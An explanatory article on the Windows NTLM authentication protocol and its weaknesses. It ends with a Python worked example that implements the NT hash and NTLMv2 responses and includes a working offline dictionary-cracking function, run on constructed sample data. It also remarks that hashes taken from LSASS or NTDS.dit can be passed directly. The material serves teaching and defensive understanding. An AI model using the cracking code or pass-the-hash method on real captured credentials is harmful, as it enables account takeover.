NT LAN Manager (NTLM)
Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a service on an Active Directory domain. When the client requests access to a service, the service sends the client a random challenge; the client computes a keyed function over that challenge, using a key derived from the user's password (the NT hash), and returns the result to the service. The service may validate the result itself (for local accounts) or forward the challenge and response to a Domain Controller (DC) for validation (for domain accounts). If the service or the DC confirms that the client's response is correct, the service grants the client access.
NTLM provides a form of single sign-on (SSO): the user supplies the underlying authentication factor (the password) only once, at logon, and the locally held NT hash is used to answer subsequent challenges.
The NTLM protocol suite is implemented in a Security Support Provider (SSP), a module loaded through the Win32 Security Support Provider Interface (SSPI) that Microsoft Windows systems use for security-related operations such as authentication, message signing and sealing. The NTLM protocol suite includes the LAN Manager authentication protocol, NTLMv1, NTLMv2 and the NTLM2 Session protocol.
NTLM is widely deployed, even on new systems, to maintain compatibility with older systems, but is no longer recommended for use by Microsoft because NTLM does not support current cryptographic methods, such as AES or SHA-256. Microsoft adopted Kerberos as the preferred authentication protocol for Windows 2000 and subsequent Active Directory domains.
NTLM is generally considered insecure because it relies on outdated cryptography (MD4 for the NT hash, DES in NTLMv1, HMAC-MD5 in NTLMv2) that is exposed to several kinds of attack. Because the response is computed from the stored NT hash rather than from the password, anyone holding the hash can authenticate without knowing the password (the pass-the-hash attack), and a captured challenge/response pair can be attacked offline by brute force or dictionary guessing without any further interaction with the DC. Because the response does not bind the session to a particular server, NTLM authentication can also be relayed to a third server unless signing or channel binding is enforced.
NTLM remains in use in places where backwards compatibility is required. Microsoft does not recommend NTLM for new implementations.
An NTLM proxy is proxy software that performs NTLM authentication on behalf of clients, for example so that applications without native NTLM support can pass through an NTLM-authenticating proxy.
Kerberos superseded NTLM as the default domain authentication protocol, although NTLM remains available as a fallback. To improve interoperability, Microsoft's Kerberos implementation includes an encryption type (RC4-HMAC) whose key is the NT hash itself. According to an independent researcher, this design decision allows a Domain Controller to be tricked into issuing a Kerberos ticket to an attacker who knows only the NT hash, a technique commonly called overpass-the-hash.
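The following is an added worked example, not part of the original article or of any Microsoft code, that ties together the challenge-response exchange described above and the two weaknesses just listed (pass-the-hash and offline cracking). It implements the NTLMv2 computation from MS-NLMP: NT hash = MD4(UTF-16LE(password)), NTOWFv2 = HMAC-MD5(NThash, UTF-16LE(UPPER(user) + domain)), NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge + blob). MD4 is written out because many OpenSSL 3 builds of Python's hashlib no longer provide it. The user name, domain, challenges, timestamp and AV_PAIR target information are constructed sample values, not a real capture; NTLMv1's DES-based response is not shown.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320). Included because OpenSSL 3 builds of hashlib often lack it;
    it is needed only to compute the NT hash."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK32

    rounds = (  # (mixing function, additive constant, X index order, shift schedule)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)      # bit length, little-endian
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a, b, c, d = d, rotl((a + func(b, c, d) + x[k] + const) & MASK32, shifts[i % 4]), b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). This is what the DC stores for the account."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NThash, UTF-16LE(UPPER(user) + domain)) (MS-NLMP 3.3.2)."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def av_pair(av_id: int, value: str) -> bytes:
    """One AV_PAIR entry of the CHALLENGE message's TargetInfo field."""
    v = value.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(v)) + v


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, timestamp: int, target_info: bytes) -> bytes:
    """Client side: NTProofStr || blob. Note the signature: only the NT hash is needed,
    never the password, which is exactly why a stolen hash can be 'passed'."""
    blob = (b"\x01\x01" + b"\x00" * 6         # RespType, HiRespType, Reserved1, Reserved2
            + struct.pack("<Q", timestamp)    # Windows FILETIME
            + client_challenge                # 8 random client bytes
            + b"\x00" * 4                     # Reserved3
            + target_info                     # AV_PAIRs copied from the CHALLENGE message
            + b"\x00" * 4)
    nt_proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def verify_ntlmv2(nt: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """Service/DC side: recompute NTProofStr over the blob the client sent, using the stored hash."""
    nt_proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)


def crack_ntlmv2(candidates, user: str, domain: str, server_challenge: bytes, response: bytes):
    """Offline attack: whoever captured (challenge, response) tests guesses with no DC involved."""
    for pw in candidates:
        if verify_ntlmv2(nt_hash(pw), user, domain, server_challenge, response):
            return pw
    return None


# Constructed sample exchange (assumed values, not a real network capture).
USER, DOMAIN = "alice", "CORP"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")   # 8 bytes from the CHALLENGE message
CLIENT_CHALLENGE = bytes.fromhex("a1b2c3d4e5f60718")   # 8 bytes chosen by the client
TIMESTAMP = 0x01DA1F2E3B4C5D6E                          # FILETIME: 100 ns ticks since 1601-01-01
TARGET_INFO = av_pair(2, "CORP") + av_pair(1, "FILESRV") + b"\x00\x00\x00\x00"  # + MsvAvEOL


def demo():
    """Legitimate logon, server-side check, then the offline attack on the same capture."""
    stored = nt_hash("password")                        # what the DC holds for alice
    resp = ntlmv2_response(stored, USER, DOMAIN, SERVER_CHALLENGE, CLIENT_CHALLENGE, TIMESTAMP, TARGET_INFO)
    ok = verify_ntlmv2(stored, USER, DOMAIN, SERVER_CHALLENGE, resp)
    cracked = crack_ntlmv2(["123456", "letmein", "password", "Winter2024"], USER, DOMAIN, SERVER_CHALLENGE, resp)
    return ok, cracked


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("server accepts, offline crack result:", demo())
```

Two things to notice when running it: the verifier never needs the password, so an attacker who obtains the 16-byte NT hash from LSASS or NTDS.dit can call ntlmv2_response exactly as a legitimate client does; and because each guess costs only one MD4 and two HMAC-MD5 operations, the captured pair can be tested against a wordlist at very high rates on commodity hardware.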